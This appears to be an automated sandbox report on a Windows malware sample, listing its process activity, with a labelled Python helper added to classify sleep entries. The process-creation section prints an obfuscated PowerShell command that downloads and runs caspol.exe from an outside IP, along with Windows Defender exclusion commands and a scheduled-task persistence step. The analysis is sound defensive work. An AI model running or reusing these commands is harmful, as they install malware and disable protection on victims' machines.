                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2214
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2674
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2402
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1360
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 928
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3932
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3113
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1320
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1322
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1726
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2226
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4785
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dll
                    Source: C:\Windows\System32\mshta.exe TID: 3512Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -240000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 6121 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 3640 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 1960Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 3908Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep count: 2363 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep count: 2093 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3044Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 1481 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 2143 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2168Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4064Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 1448Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\taskeng.exe TID: 804Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe TID: 3128Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe TID: 2164Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3516Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3124Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3548Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\mshta.exe TID: 3512Thread sleep time: -720000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3068Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep count: 3113 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep count: 1320 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 380Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 3640Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 2140Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2160Thread sleep count: 1322 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2160Thread sleep count: 1726 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3828Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 60000
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE89273122 rdtsc 5_2_000007FE89273122
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_0040317B mov eax, dword ptr fs:[00000030h]28_2_0040317B
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_00402B7C GetProcessHeap,HeapAlloc,28_2_00402B7C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory allocated: page read and write | page guard
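The "Thread sleep time" and "Thread delayed" entries above mix two different things. 922337203685477 ms is exactly the integer part of TimeSpan.MaxValue.TotalMilliseconds (2^63 - 1 ticks of 100 ns), and the 1844674407370954 and 2767011611056431 entries are 2x and 3x that value, so those entries read as blocking waits with an unbounded timeout that the sandbox records as sleeps; the finite values (60000, 120000, 240000, 720000 ms, i.e. one to twelve minutes) are the ones that actually eat into an analysis budget. That reading is the editor's, not the report's. The Python below is an added example, not part of the Joe Sandbox report: it parses a handful of lines copied from the report (labelled as a constructed sample), separates the two classes, and flags processes whose summed finite sleeps exceed an assumed 120 s budget (the budget value and the per-image grouping are the editor's choices).

```python
import re
from collections import defaultdict

# TimeSpan.MaxValue is 2**63-1 ticks of 100 ns; in whole milliseconds that is 922337203685477.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
SANDBOX_BUDGET_MS = 120_000  # assumed analysis budget of a sandbox run, editor's choice

# Joe Sandbox renders sleeps as "-<ms>s" and delays as "delay time: <ms>"; both regexes are the editor's.
_SLEEP = re.compile(r"Source: (?P<image>\S+?\.exe).*?Thread sleep time: -(?P<ms>\d+)s")
_DELAY = re.compile(r"Source: (?P<image>\S+?\.exe)Thread delayed: delay time: (?P<ms>\d+)")

# Constructed sample: a subset of the report's own sleep/delay lines.
SAMPLE = r"""
Source: C:\Windows\System32\mshta.exe TID: 3512Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3044Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 1960Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe TID: 3908Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\mshta.exe TID: 3512Thread sleep time: -720000s >= -30000s
Source: C:\Users\user\AppData\Roaming\caspol.exeThread delayed: delay time: 60000
"""


def classify_waits(report_lines):
    """Group sleep/delay entries by image name; split unbounded waits from timed sleeps."""
    summary = defaultdict(lambda: {"finite_ms": 0, "infinite_waits": 0})
    for line in report_lines:
        m = _SLEEP.search(line) or _DELAY.search(line)
        if not m:
            continue
        image = m.group("image").rsplit("\\", 1)[-1].lower()
        ms = int(m.group("ms"))
        if ms % TIMESPAN_MAX_MS == 0:
            # 1x, 2x, 3x TimeSpan.MaxValue: a wait with no real timeout, not a timed sleep
            summary[image]["infinite_waits"] += 1
        else:
            summary[image]["finite_ms"] += ms
    return dict(summary)


def exceeds_budget(summary, budget_ms=SANDBOX_BUDGET_MS):
    """Images whose timed sleeps alone outlast the analysis budget (sorted for stable output)."""
    return sorted(img for img, s in summary.items() if s["finite_ms"] > budget_ms)


if __name__ == "__main__":
    waits = classify_waits(SAMPLE.strip().splitlines())
    for image, s in sorted(waits.items()):
        print(f"{image:16} timed sleep {s['finite_ms'] / 1000:8.1f} s   unbounded waits: {s['infinite_waits']}")
    print("outlasts budget:", exceeds_budget(waits))
```

Run against the sample, mshta.exe accumulates 13 minutes of timed sleep and caspol.exe exactly two minutes; the PowerShell entries with 922337203685477 and its multiples are counted as unbounded waits and contribute nothing to the timed total.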

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory written: C:\Users\user\AppData\Roaming\caspol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeMemory written: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMemory written: C:\Users\user\AppData\Roaming\caspol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp" "c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeProcess created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'…'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp" "c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
                    Source: C:\Users\user\AppData\Roaming\caspol.exeProcess created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicai